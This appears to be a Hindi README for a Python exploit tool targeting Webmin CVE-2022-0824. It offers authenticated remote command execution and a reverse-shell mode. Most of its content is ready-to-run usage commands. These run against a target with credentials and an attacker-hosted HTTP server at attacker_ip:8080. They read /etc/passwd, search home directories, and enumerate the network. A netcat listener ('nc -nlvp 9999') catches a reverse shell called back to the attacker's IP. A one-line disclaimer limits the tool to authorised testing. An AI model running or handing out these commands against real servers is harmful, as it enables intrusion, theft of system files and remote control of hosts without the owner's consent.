
Webmin CVE-2022-0824 के लिए Python एक्सप्लॉइट जिसमें दो-मोड समर्थन है: सीधे कमांड निष्पादन और रिवर्स शेल। इसमें कई पेलोड प्रकार, बुद्धिमान फ़ाइल प्रबंधन, और अधिकृत सुरक्षा परीक्षण के लिए विस्तृत डीबग लॉगिंग शामिल हैं।
[!IMPORTANT]
Webmin CVE-2022-0824 उन्नत शोषण उपकरण - कमांड निष्पादन और रिवर्स शेल दोहरे मोड का समर्थन करता है
[!IMPORTANT]
Webmin CVE-2022-0824 भेद्यता के लिए एक उन्नत शोषण उपकरण, जो सीधे कमांड निष्पादन और रिवर्स शेल दो मोड का समर्थन करता है।
# Python 3.6+
pip3 install requests urllib3
# बुनियादी कमांड निष्पादन
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# सिस्टम जानकारी देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# फ़ाइलें सूचीबद्ध करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# संवेदनशील फ़ाइलें देखें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# नेटवर्क जानकारी
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
# 1. लिसनर प्रारंभ करें
nc -nlvp 9999
# 2. शोषण निष्पादित करें
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
*नोट: रिवर्स शेल मोड में आवश्यक
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
Issue और Pull Request सबमिट करने का स्वागत है!
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)यह प्रोजेक्ट MIT लाइसेंस के तहत है - विवरण के लिए LICENSE फ़ाइल देखें
यदि कोई प्रश्न या सुझाव हो, तो कृपया निम्नलिखित माध्यमों से संपर्क करें:
⭐ यदि यह प्रोजेक्ट आपके लिए उपयोगी है, तो कृपया एक Star देकर समर्थन करें!
requests>=2.25.1
urllib3>=1.26.0
| पैरामीटर | विवरण | आवश्यक | उदाहरण |
|---|
-t, --target | लक्ष्य Webmin URL | ✅ | http://192.168.1.100:10000/ |
-c, --credential | लॉगिन क्रेडेंशियल | ✅ | admin:password |
-LS, --py3http_server | HTTP सर्वर पता | ✅ | 192.168.1.50:8080 |
--shell | निष्पादित करने के लिए कमांड | ❌ | "ls -la" |
-L, --callback_ip | रिवर्स शेल कॉलबैक IP | ❌* | 192.168.1.50 |
-P, --callback_port | रिवर्स शेल कॉलबैक पोर्ट | ❌* | 9999 |